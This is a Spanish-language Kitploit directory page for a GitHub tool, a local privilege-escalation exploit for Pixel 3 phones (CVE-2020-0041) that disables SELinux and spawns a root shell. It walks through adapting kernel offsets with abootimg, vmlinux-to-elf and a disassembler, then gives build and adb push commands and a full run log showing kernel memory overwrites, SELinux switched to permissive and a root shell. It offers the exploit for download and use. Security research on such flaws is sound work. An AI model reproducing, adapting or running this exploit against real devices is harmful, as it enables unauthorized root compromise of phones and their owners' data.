Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
root-exploit-pixel3 — Exploit de escalada de privilegios local para Pixel 3 (CVE-2020-0041) que desactiva SELinux y genera una shell root mediante corrupción de memoria del kernel y adaptación de offsets. | Kitploit
Herramientas/GitHubGitHub/jcalabres/root-exploit-pixel3
Seguridad AndroidEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónIngeniería InversaPruebas de PenetraciónExplotación de Binarios
GitHubjcalabres/root-exploit-pixel3

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

root-exploit-pixel3

Exploit de escalada de privilegios local para Pixel 3 (CVE-2020-0041) que desactiva SELinux y genera una shell root mediante corrupción de memoria del kernel y adaptación de offsets.

Ver Repositorio
1352hace 3 añosAún no revisado

Exploit de Root para la Familia Pixel 3

Esta carpeta contiene un exploit de escalada de privilegios local, una modificación del PoC de bluefrostsecurity para CVE-2020-0041. El exploit desactiva SELinux y luego lanza un shell de root.

  • El exploit fue proporcionado con offsets fijos para un dispositivo Pixel 3 con el firmware de febrero de 2020 (QQ1A.200205.002). El exploit se puede adaptar para cualquier dispositivo Pixel 3 siguiendo los pasos a continuación.

  • Se han realizado algunos cambios para evitar las limitaciones del usuario root (el exploit original no es utilizable).

Adaptando el exploit

  1. Para adaptar el exploit a cualquier dispositivo Pixel 3, es necesario descargar el firmware vulnerable específico (QQ1A.200205.002) desde el sitio web oficial developer android images.

  2. Posteriormente, convierta el boot.img en un zImage. Para ello, use abootimg.

root@kitploit:~
./abootimg -x [ruta_al_boot_img]

El zImage generado es una imagen que contiene el Kernel de Android comprimido.

  1. Para obtener una imagen descomprimida del Kernel que contenga los símbolos y offsets correctos, use la herramienta vmlinux-to-elf.
root@kitploit:~
vmlinux-to-elf [ruta_al_zImage] [kernel.elf] 
  1. Utilice un desensamblador de su preferencia para encontrar las etiquetas relacionadas con los offsets del exploit que se encuentran en exploit.c:
root@kitploit:~
SELINUX_ENFORCING_OFFSET 
MEMSTART_ADDR_OFFSET 
SYSCTL_TABLE_ROOT_OFFSET
PROC_DOUINTVEC_OFFSET
INIT_TASK_OFFSET
INIT_CRED_OFFSET
OFFSET_PIPE_FOP
  1. Alinee exploit.c con los offsets correctos.

  2. Benefíciese :)

Probando el exploit

El exploit se puede compilar simplemente ejecutando "make" con el NDK de Android en la ruta (también puede tomar el binario poc de libs/arm64-v8a path). También se puede enviar a un teléfono conectado con adb ejecutando "make all push" (se han eliminado las advertencias para mayor claridad):

root@kitploit:~
user@laptop:~/CVE-2020-0041/lpe$ make all push
Building Android
NDK_PROJECT_PATH=. ndk-build NDK_APPLICATION_MK=./Application.mk
make[1]: Entering directory `/home/user/CVE-2020-0041/lpe'
[arm64-v8a] Compile        : poc <= exploit.c
[arm64-v8a] Compile        : poc <= endpoint.c
[arm64-v8a] Compile        : poc <= pending_node.c
[arm64-v8a] Compile        : poc <= binder.c
[arm64-v8a] Compile        : poc <= log.c
[arm64-v8a] Compile        : poc <= helpers.c
[arm64-v8a] Compile        : poc <= binder_lookup.c
[arm64-v8a] Compile        : poc <= realloc.c
[arm64-v8a] Compile        : poc <= node.c
[arm64-v8a] Executable     : poc
[arm64-v8a] Install        : poc => libs/arm64-v8a/poc
make[1]: Leaving directory `/home/user/CVE-2020-0041/lpe'
adb push libs/arm64-v8a/poc /data/local/tmp/poc
libs/arm64-v8a/poc: 1 file pushed. 4.3 MB/s (39016 bytes in 0.009s)

Ahora simplemente ejecute /data/local/tmp/poc desde un shell adb para ver el exploit en funcionamiento:

root@kitploit:~
blueline:/ $ /data/local/tmp/poc
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd9c67c7700
[*] file epitem at ffffffda545d7d00
[*] Reallocating content of 'write8_inode' with controlled data.[DONE]
[+] Overwriting 0xffffffd9c67c7720 with 0xffffffda545d7d50...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff97df1af650
[+] kernel base: ffffff97dd280000
[*] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff97dfe24000 with 0x0...[DONE]
[*] init_cred: ffffff97dfc300a0
[+] memstart_addr: 0xffffffe700000000
[+] First level entry: ceac5003 -> next table at ffffffd9ceac5000
[+] Second level entry: f173c003 -> next table at ffffffd9f173c000
[+] sysctl_table_root = ffffff97dfc5a3f8
[*] Reallocating content of 'write8_sysctl' with controlled data.[DONE]
[+] Overwriting 0xffffffda6da8d868 with 0xffffffda49ced000...[DONE]
[+] Injected sysctl node!
[*] Node write8_inode, pid 7058, kaddr ffffffda0723f900
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_selinux, pid 6848, kaddr ffffffd9c9fa2400
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_sysctl, pid 7110, kaddr ffffffda67e7d180
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[*] epitem.next = ffffffd9c67c7720
[*] epitem.prev = ffffffd9c67c77d8
^[[*] Launching privileged shell
root_by_cve-2020-0041:/ # id   
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
root_by_cve-2020-0041:/ # getenforce
Permissive
root_by_cve-2020-0041:/ # 
Descargar herramienta